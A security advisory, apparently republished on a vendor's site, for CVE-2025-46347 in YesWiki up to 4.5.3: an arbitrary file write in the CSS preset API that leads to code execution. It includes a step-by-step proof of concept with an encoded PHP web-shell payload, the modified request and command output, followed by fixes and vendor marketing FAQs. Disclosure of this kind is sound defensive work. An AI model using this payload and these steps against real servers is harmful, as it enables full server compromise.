Summary
An arbitrary file write can be used to write a file with a PHP extension, which then can be browsed to in order to execute arbitrary code on the server.
All testing was performed on a local docker setup running the latest version of the application.
PoC
Proof of Concept
Navigate to http://localhost:8085/?LookWiki which allows you to click Create a new Graphical configuration where you specify some parameters and then click Save.
After clicking save, this request is made (most headers removed for clarity):
POST /?api/templates/custom-presets/test.css HTTP/1.1
Host: localhost:8085
primary-color=%230c5d6a&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serif
This request writes the file test.css to disk with the contents (abbreviated)
:root {
--primary-color: #0c5d6a;
--secondary-color-1: #d8604c;
--secondary-color-2: #d78958;
--neutral-color: #4e5056;
--neutral-soft-color: #57575c;
--neutral-light-color: #f2f2f2;
--main-text-fontsize: 17px;
--main-text-fontfamily: "Nunito", sans-serif;
--main-title-fontfamily: 'Nunito', sans-serif;
}
To exploit this, utilize a proxy tool to intercept the the first request and change the filename extension to .php and add arbitrary PHP code in for one of the request body parameters.
e.g. primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E
Now the file pizzapower.php is written to /var/www/html/custom/css-presets/pizzapower.php and it starts with this, where the PHP code is present.
:root {
--primary-color: <?php system($_GET['cmd']); ?>;
--secondary-color-1: #d8604c;
--secondary-color-2: #d78958;
--neutral-color: #4e5056;
--neutral-soft-color: #57575c;
--neutral-light-color: #f2f2f2;
--main-text-fontsize: 17px;
--main-text-fontfamily: "Nunito", sans-serif;
--main-title-fontfamily: 'Nunito', sans-serif;
}
Then, simply visit the file with a cmd parameter included.
http://localhost:8085/custom/css-presets/pizzapower.php?cmd=id
And the HTTP response will contain the output of our command. Notably this request can be performed unauthenticated (the creation of the file requires auth, though).
:root {
--primary-color: uid=501(yeswiki) gid=501 groups=501
;
--secondary-color-1: #d8604c;
--secondary-color-2: #d78958;
--neutral-color: #4e5056;
--neutral-soft-color: #57575c;
--neutral-light-color: #f2f2f2;
--main-text-fontsize: 17px;
--main-text-fontfamily: "Nunito", sans-serif;
--main-title-fontfamily: 'Nunito', sans-serif;
}
Fixes
Amongst others:
Restrict file extensions: Only allow a safelist of extensions (e.g., .css) when saving files via this feature.
Harden server config: Disable PHP execution in user-writable directories
Impact
Full compromise of the server. Can potentially be performed unwittingly by a user subjected to the previously reported (or future) XSS vulnerabilities.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-46347? CVE-2025-46347 is a high-severity security vulnerability in yeswiki/yeswiki (composer), affecting versions <= 4.5.3. It is fixed in 4.5.4.
- Which versions of yeswiki/yeswiki are affected by CVE-2025-46347? yeswiki/yeswiki (composer) versions <= 4.5.3 is affected.
- Is there a fix for CVE-2025-46347? Yes. CVE-2025-46347 is fixed in 4.5.4. Upgrade to this version or later.
- Is CVE-2025-46347 exploitable, and should I be worried? Whether CVE-2025-46347 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-46347 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-46347? Upgrade
yeswiki/yeswikito 4.5.4 or later.